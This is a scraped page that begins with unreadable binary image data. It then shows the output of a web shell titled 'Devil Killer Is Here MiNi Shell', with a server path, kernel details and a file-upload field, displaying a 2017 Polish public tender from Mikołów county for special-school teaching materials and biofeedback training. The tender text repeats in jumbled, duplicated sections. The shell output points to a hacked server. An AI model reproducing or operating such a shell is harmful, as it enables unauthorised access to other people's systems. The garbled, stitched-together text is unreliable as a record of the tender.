JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170425/73017-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://powiat_mikolow.bip.gov.pl' target='_blank'>http://powiat_mikolow.bip.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 73017 - 2017
              z dnia 2017-04-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mikołów: Dostawa materiałów dydaktycznych ze szkoleniem dla Zespołu Szkół Nr 1 Specjalnych w Mikołowie oraz Zespołu Szkół Nr 2 Specjalnych w Mikołowie w ramach zadania Kompleksowe doposażenie szkół specjalnych w projekcie pn.: Kompleksowa Edukacja Specjalna -Program Indywidualizacji Nauczania Uczniów ze Specjalnymi Potrzebami Edukacyjnymi w Powiecie Mikołowskim w latach 2016  2018<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Kompleksowa Edukacja Specjalna - Program Indywidualizacji Nauczania Uczniów ze Specjalnymi Potrzebami Edukacyjnymi w Powiecie Mikołowskim w latach 2016 - 2018 współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014  2020,                  oś priorytetowa: XI. Wzmocnienie potencjału edukacyjnego dla działania: 11.1. Ograniczenie przedwczesnego kończenia nauki szkolnej oraz zapewnienie równego dostępu do dobrej jakości edukacji elementarnej, kształcenia podstawowego i średniego dla poddziałania: 11.1.4. Poprawa efektywności kształcenia ogólnego.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Powiatu Mikołowskiego, krajowy numer identyfikacyjny
              27628477900000, ul.
              ul. Żwirki i Wigury 
              ,
              43190  
              Mikołów, woj.
              śląskie, państwo
              Polska, tel.
              (032) 32-48-100,  32-48-125, e-mail
              zampub@powiat.mikolow.pl, faks
              (032) 32-48-147, 32-48-132.
              <br />
              Adres strony internetowej (URL): http://powiat_mikolow.bip.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://powiat_mikolow.bip.gov.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://powiat_mikolow.bip.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w języku polskim, z zacowaniem formy piemnej pod rygorem nieważności. Zaawiajacy nie wyraża zgody na złożenie oferty w postaci elektronicznej<br />
                Adres:
                <br />Starostwo Powiatowe w Mikołowie ul. Żwirki i Wigury 4a, 43-190 Mikołów , wejscie B, parter, kancelaria- pokój 127</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa materiałów dydaktycznych ze szkoleniem dla Zespołu Szkół Nr 1 Specjalnych w Mikołowie oraz Zespołu Szkół Nr 2 Specjalnych w Mikołowie w ramach zadania Kompleksowe doposażenie szkół specjalnych w projekcie pn.: Kompleksowa Edukacja Specjalna -Program Indywidualizacji Nauczania Uczniów ze Specjalnymi Potrzebami Edukacyjnymi w Powiecie Mikołowskim w latach 2016  2018<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest dostawa do Zespołu Szkół Nr 1 Specjalnych w Mikołowie ul Gliwicka 366 oraz Zespołu Szkół Nr 2 Specjalnych przy ul. Pokoju 4a w Mikołowie materiałów dydaktycznych ze szkoleniem użytkowników w ramach projektu pn.: Kompleksowa Edukacja Specjalna - Program Indywidualizacji Nauczania Uczniów ze Specjalnymi Potrzebami Edukacyjnymi w Powiecie Mikołowskim w latach 2016 - 2018 współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014  2020,oś priorytetowa: XI. Wzmocnienie potencjału edukacyjnego dla działania: 11.1. Ograniczenie przedwczesnego kończenia nauki szkolnej oraz zapewnienie równego dostępu do dobrej jakości edukacji elementarnej, kształcenia podstawowego i średniego dla poddziałania: 11.1.4. Poprawa efektywności kształcenia ogólnego.
2.Przedmiot zamówienia został podzielony na 2 zdania:
2.1 Zadanie I
2.1.Dostawa materiałów dydaktycznych GRUPA I DIAGNOZA FUNKCJONALNA do ZSS nr 2 Specjalnych w Mikołowie wraz ze szkoleniem pn.: Diagnoza Profilu Psychoedukacyjnego (PEP-R)E. Schoplera oraz konstrukcja indywidualnych programów edukacyjno-terapeutycznych dla dzieci z deficytami rozwojowymi od 1 do 12 roku życia  z wykorzystaniem programu komputerowego EDU-4XXL Multimedia oraz programu EDU 2 dla młodzieży dla 4 osób.
2.1.1. Przedmiot zamówienia obejmuje dostawę poniższych pomocy dydaktycznych, których szczegółowy opis  zawiera załącznik nr 2a do SIWZ:
1. Zestaw "INSTRUMENTY MUZYCZNE" lub równoważny .
2. ZESZYT ĆWICZEŃ GRAFICZNYCH  nr 1 i nr 2.
3. ZESTAW  MAŁA MATEMATYKA lub produkt równoważny.
4. ZESTAW BAJEK O RYBAKU I ZŁOTEJ RYBCE, CALINECZKA, JAŚ I MAŁGOSIA z płytą CD. 
5. ZESTAW GRA CIAŁA  lub równoważny.
6. Zestawy: SMUTNE I WESOŁE OBRAZY", PRZYMIOTNIKI I STANY EMOCJONALNE do teorii umysłu lub produkt równoważny.
7. Zestaw do diagnozy profilu psychoedukacyjnego dla dzieci- zestaw mat. Graficznych do testu PEP-R.
8. Materiały graficzne do diagnozy młodzieży - do testu AAPEP.
9. Zestaw pomocy do diagnozy do profilu psychoedukacyjnego PEP-R E. Schoplera.
10. ZESTAW - ZABAWY DŹWIĘKONAŚLADOWCZE lub zestaw równoważny
11. ZESTAW WSPOMAGAJĄCY MOWĘ ZESTAW Z LITERKAMI I  RYMOWANKAMI  z płytą CD
12. ZESTAW CZASOWNIKI .
13. ZESTAWY: "SYGNAŁY", MIEJSCA, KUCHNIA, ŁAZIENKA do rozwijania percepcji słuchowej.
14. Program EDU-3 część 1 i część 4 lub równoważne.
15. Program komputerowy EDU - Jurczyszyn - 2 Multimedia lub równoważny ze szkoleniem opisanym poniżej
16. Program EDU 4XXL Multimedia - program do diagnozy i konstrukcji indywidualnych programów edukacyjno-terapeutycznych lub program równoważny.
2.1.2. Szkolenie p.n.:Diagnoza Profilu Psychoedukacyjnego (PEP-R) E. Schoplera oraz konstrukcja indywidualnych programów edukacyjno-terapeutycznych dla dzieci z deficytami rozwojowymi od 1 do 12 roku życia  z wykorzystaniem programu komputerowego EDU-4XXL Multimedia oraz programu EDU 2 dla młodzieży dla 4 osób.
2.1.2.1.Opis szkolenia:
1.	Szkolenie przeznaczone jest dla 4 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego; 
2.	Wymiar szkolenia   minimum 6 h dla każdego z uczestników;
3.	Szkolenie realizowane w miejscu wskazanym przez Zamawiającego w formie warsztatów z diagnozowania;
4. 	Wykonawca zapewnia materiały szkoleniowe oraz dostęp do wszelkich pomocy naukowych oferowanych w ramach szkolenia w tym zasobów biblioteczno-informacyjnych Wykonawcy oraz materiałów dydaktycznych umieszczanych na stronach internetowych i intranetowych Wykonawcy.;
5.	Wykonawca zobowiązuje się do wystawienia certyfikatu potwierdzającego udział w szkoleniu.
2.1.2.2. Minimalna tematyka szkolenia w zakresie diagnozy PEP-R część 1
a) Diagnoza pedagogiczna dziecka do 12 roku życia.
b) Posługiwanie się testem.
c) Ćwiczenia w zakresie realizacji zadań testowych z obszaru rozwoju.
d) Ćwiczenia w zakresie realizacji zadań testowych z obszaru zachowań.
e) Wypełnianie arkuszy ocen.
f) Analiza wyników z obszaru rozwoju.
2.2. Zadanie II
Dostawa materiałów dydaktycznych GRUPA II BIOFEEDBACK do ZSS nr 1 i ZSS nr 2 Specjalnych w Mikołowie wg załącznika nr 2b wraz ze szkoleniami pn.: 
1. nIR HEG BIOFEEDBACK W ADD I ADHD
2. BIOFEEDBACK I stopień.
2.2.1.Przedmiot zamówienia w zadaniu II obejmuje dostawę poniższych pomocy dydaktycznych, których szczegółowy opis  zawiera załącznik nr 2b do SIWZ:
1. Aparat EEG Biofeedback 2 kanałowy lub równoważny.
2. HEG-System do procomp 5 równoważne
3. Aktualizacja do programu Biograf Infiniti 6.0 lub równoważne.
4. Dodatkowe plansze stymulacyjne Biofeedback EEG lub równoważne
5. Czujnik oddechowy
6. Gry Flash pakiet 5 gier lub równoważne
7.  Animacje biograph X Infiniti dvd.
8. BioFun games lub równoważne
9. Gra Zukor Zukor's Carnival lub równoważna.
10. Fotel masujący wypoczynkowy z ogrzewaniem.
2.2.2. Szkolenie p.n. nIR HEG BIOFEEDBACK W ADD I ADHD 
Metoda nIR HEG-biofeedback lub równoważna proponowana podczas szkolenia powinna być nowatorska i w odróżnieniu od powszechnie w Polsce znanej metody EEG-biofeedback ma analizować aktywność trenowanego obszaru mózgu za pomocą podczerwieni, co pozwoli na ocenę procentowej zmiany jego natlenienia. Proponowana metoda ma cechować się prostotą obsługi urządzenia, analizą wyników, a także zredukowaniem do minimum czynności przygotowawczych (bez używania past, klejenia elektrod, przygotowania skóry itp.). W zapisie nie mogą występować artefakty, takie jak mruganie oczami, co pozwoli wykonywać treningi obszarów czołowych bez żadnych zakłóceń.
2..2.2.1.Szczegóły dotyczące realizacji szkolenia:
a) Szkolenie przeznaczone jest dla 2 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego.
b) Wymiar szkolenia   minimum 5 h dla każdego z uczestników szkolenia;
c) Szkolenie realizowane będzie na terenie i w budynku wskazanym przez Wykonawcę;
d) Wykonawca zapewnia salę szkoleniową, materiały dydaktyczne, przerwę kawową i obiad;
e) Wykonawca zobowiązuje się do wystawienia certyfikatu potwierdzającego udział w szkoleniu.
2.2.2.2.  W trakcie przerwy w szkoleniu Wykonawca zapewni uczestnikom gorące napoje w postaci kawy i herbaty z dodatkami  w postaci  cukru, mleka i cytryny w ilości według uznania konsumenta. Dodatkowo w czasie kursu zapewni  wodę mineralną i sok w butelkach min. 120 ml. W czasie przerwy obiadowej Wykonawca dostarczy uczestnikom gorący posiłek w formie drugiego dania w zamkniętych naczyniach jednorazowych z plastikowymi sztućcami i serwetkami oraz z dodatkiem napoju w formie soku, owocu lub batonika. Posiłek powinien posiadać gramaturę nie mniej niż 450 gram posiłku przygotowanego do spożycia i kaloryczność nie mniej niż 700 kcal; w przypadku dania mięsnego lub rybnego: ziemniaki, kasza, ryż, makaron - nie mniej niż 150 g; mięso- ryba nie mniej niż 150-200g, surówka nie mniej niż 150g.
2.2.3. Szkolenie BIOFEEDBACK I stopień
Program szkolenia powinien obejmować tematykę proponowaną przez BCIA (Biofeedback Certification Institute of America) lub równoważną. Omawiane zagadnienia dotyczyć powinnypodstaw EEG (elektroencefalografii), systemu 1020, teorii metody biofeedback lub równoważnej, zasad prowadzenia terapii pacjenta, a także protokołów terapeutycznych dla danego zaburzenia.
2.2.3. 1.Szkolenie w części praktycznej powinno obejmować:
a) obsługę podstawowych funkcji programu; prowadzenie sesji treningowej, zarządzanie bazą danych; 
b) przeglądanie i odtwarzanie zapisanych sesji, raportów i statystyk; 
c) obsługę podstawowych protokołów treningowych; 
d) obsługę edytora ekranów Lite  w tym dostosowywanie ekranu do potrzeb treningu.
2.2.3.2.W trakcie szkolenia prowadzący powinien zapewnić:
a) solidne wprowadzenie teoretyczne, w tym przegląd najnowszych badań naukowych;
b) dużą liczbę zajęć praktycznych w małych grupach przy aparaturze;
c) pracę z najwyższej klasy aparaturą biofeedback (system Infiniti) lub równoważną;
d) pokaz innych metod i urządzeń, w tym metody HEG-biofeedback i metody Warnkego.
2.2.3.3.Szczegóły dotyczące realizacji szkolenia:
1.	Szkolenie przeznaczone jest dla 5 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego; 
2.	Wymiar szkolenia   minimum 38 h  dla każdego z uczestników, podzielone na min. 4 dni wykładowe.
3.     Szkolenie przeprowadzi osoba posiadająca wymagane uprawnienia i doświadczenie w zakresie objętym szkoleniem.
3.	Szkolenie realizowane będzie na terenie i w budynku wskazanym przez Wykonawcę;
4.	Wykonawca zapewnia salę szkoleniową, materiały dydaktyczne, przerwy kawowe i obiad;
5. 	Kurs zakończony ma być egzaminem, a uczestnik ma otrzymać certyfikat upoważniający                   do prowadzenia diagnostyki, terapii i treningów metodą EEG-biofeedback.
2.2.3.3.2.  W trakcie przerwy w szkleniu Wykonawca zapewni uczestnikom gorące napoje w postaci kawy i herbaty z dodatkami  w postaci  cukru, mleka i cytryny w ilości według uznania konsumenta. Dodatkowo w czasie kursu zapewni  wodę mineralną i sok w butelkach min. 120 ml. W czasie przerwy obiadowej Wykonawca dostarczy uczestnikom gorący posiłek w formie drugiego dania w zamkniętych naczyniach jednorazowych z plastikowymi sztućcami i serwetkami oraz z dodatkiem napoju w formie soku, owocu lub batonika. Posiłek powinien posiadać gramaturę nie mniej niż 450 gram posiłku przygotowanego do spożycia i kaloryczność nie mniej niż 700 kcal; w przypadku dania mięsnego lub rybnego: ziemniaki, kasza, ryż, makaron - nie mniej niż 150 g; mięso- ryba nie mniej niż 150-200g, surówka nie mniej niż 150g.
g) Analiza wyników z obszaru zachowań.
h) Dokumentacja diagnostyczna nanoszenia wyników.
i) Szczegółowa charakterystyka rozwoju na podstawie zebranych z diagnozy informacji
j) Szczegółowa charakterystyka zaburzeń
k) Sformułowanie ogólnych i szczegółowych wniosków z diagnozy. 
2.1.2.3.Minimalna tematyka szkolenia część 2:
a) Rejestracja oprogramowania.
b) Tworzenie dokumentacji dziecka- archiwizacja danych.
c) Wpisanie wyników badania do oprogramowania.
d) Wygenerowanie wyników diagnozy.  
e) Przygotowanie opisu diagnozy z uwzględnieniem deficytów parcjalnych.  
f) Przygotowanie opisu skali zachowam z uwzględnieniem poszczególnych sfer.
g) Przygotowanie szczegółowej oceny reakcji na bodźce
h) Zakończenie diagnozy i jej pisemne podsumowanie.
i) Archiwizacja danych dziecka.
2.1.2.4.Konstrukcja indywidualnego programu edukacyjno  terapeutycznego:
a) Przeniesienie danych z diagnozy do druków Indywidualnego Programu Edukacyjno-terapeutycznego z uwzględnieniem deficytów.
b) Dokładne uzasadnienie terapii z opisem występujących deficytów w poszczególnych ocenianych obszarach.
c) Ustalenie ogólnych i szczegółowych celów terapii w indywidualnym programie edukacyjno  terapeutycznym.
d) Wybranie z bazy konspektów odpowiednich konspektów do terapii.2.2. Zadanie II
Dostawa materiałów dydaktycznych GRUPA II BIOFEEDBACK do ZSS nr 1 i ZSS nr 2 Specjalnych w Mikołowie wg załącznika nr 2b wraz ze szkoleniami pn.: 
1. nIR HEG BIOFEEDBACK W ADD I ADHD
2. BIOFEEDBACK I stopień.
2.2.1.Przedmiot zamówienia w zadaniu II obejmuje dostawę poniższych pomocy dydaktycznych, których szczegółowy opis  zawiera załącznik nr 2b do SIWZ:
1. Aparat EEG Biofeedback 2 kanałowy lub równoważny.
2. HEG-System do procomp 5 równoważne
3. Aktualizacja do programu Biograf Infiniti 6.0 lub równoważne.
4. Dodatkowe plansze stymulacyjne Biofeedback EEG lub równoważne
5. Czujnik oddechowy
6. Gry Flash pakiet 5 gier lub równoważne
7.  Animacje biograph X Infiniti dvd.
8. BioFun games lub równoważne
9. Gra Zukor Zukor's Carnival lub równoważna.
10. Fotel masujący wypoczynkowy z ogrzewaniem.
2.2.2. Szkolenie p.n. nIR HEG BIOFEEDBACK W ADD I ADHD 
Metoda nIR HEG-biofeedback lub równoważna proponowana podczas szkolenia powinna być nowatorska i w odróżnieniu od powszechnie w Polsce znanej metody EEG-biofeedback ma analizować aktywność trenowanego obszaru mózgu za pomocą podczerwieni, co pozwoli na ocenę procentowej zmiany jego natlenienia. Proponowana metoda ma cechować się prostotą obsługi urządzenia, analizą wyników, a także zredukowaniem do minimum czynności przygotowawczych (bez używania past, klejenia elektrod, przygotowania skóry itp.). W zapisie nie mogą występować artefakty, takie jak mruganie oczami, co pozwoli wykonywać treningi obszarów czołowych bez żadnych zakłóceń.
2..2.2.1.Szczegóły dotyczące realizacji szkolenia:
a) Szkolenie przeznaczone jest dla 2 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego.
b) Wymiar szkolenia   minimum 5 h dla każdego z uczestników szkolenia;
c) Szkolenie realizowane będzie na terenie i w budynku wskazanym przez Wykonawcę;
d) Wykonawca zapewnia salę szkoleniową, materiały dydaktyczne, przerwę kawową i obiad;
e) Wykonawca zobowiązuje się do wystawienia certyfikatu potwierdzającego udział w szkoleniu.
2.2.2.2.  W trakcie przerwy w szkoleniu Wykonawca zapewni uczestnikom gorące napoje w postaci kawy i herbaty z dodatkami  w postaci  cukru, mleka i cytryny w ilości według uznania konsumenta. Dodatkowo w czasie kursu zapewni  wodę mineralną i sok w butelkach min. 120 ml. W czasie przerwy obiadowej Wykonawca dostarczy uczestnikom gorący posiłek w formie drugiego dania w zamkniętych naczyniach jednorazowych z plastikowymi sztućcami i serwetkami oraz z dodatkiem napoju w formie soku, owocu lub batonika. Posiłek powinien posiadać gramaturę nie mniej niż 450 gram posiłku przygotowanego do spożycia i kaloryczność nie mniej niż 700 kcal; w przypadku dania mięsnego lub rybnego: ziemniaki, kasza, ryż, makaron - nie mniej niż 150 g; mięso- ryba nie mniej niż 150-200g, surówka nie mniej niż 150g.
2.2.3. Szkolenie BIOFEEDBACK I stopień
Program szkolenia powinien obejmować tematykę proponowaną przez BCIA (Biofeedback Certification Institute of America) lub równoważną. Omawiane zagadnienia dotyczyć powinny podstaw EEG (elektroencefalografii), systemu 1020, teorii metody biofeedback lub równoważnej, zasad prowadzenia terapii pacjenta, a także protokołów terapeutycznych dla danego zaburzenia.
2.2.3. 1.Szkolenie w części praktycznej powinno obejmować:
a) obsługę podstawowych funkcji programu; prowadzenie sesji treningowej, zarządzanie bazą danych; 
b) przeglądanie i odtwarzanie zapisanych sesji, raportów i statystyk; 
c) obsługę podstawowych protokołów treningowych; 
d) obsługę edytora ekranów Lite  w tym dostosowywanie ekranu do potrzeb treningu.
2.2.3.2.W trakcie szkolenia prowadzący powinien zapewnić:
a) solidne wprowadzenie teoretyczne, w tym przegląd najnowszych badań naukowych;
b) dużą liczbę zajęć praktycznych w małych grupach przy aparaturze;
c) pracę z najwyższej klasy aparaturą biofeedback (system Infiniti) lub równoważną;
d) pokaz innych metod i urządzeń, w tym metody HEG-biofeedback i metody Warnkego.
2.2.3.3.Szczegóły dotyczące realizacji szkolenia:
1.	Szkolenie przeznaczone jest dla 5 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego; 
2.	Wymiar szkolenia   minimum 38 h  dla każdego z uczestników, podzielone na min. 4 dni wykładowe.
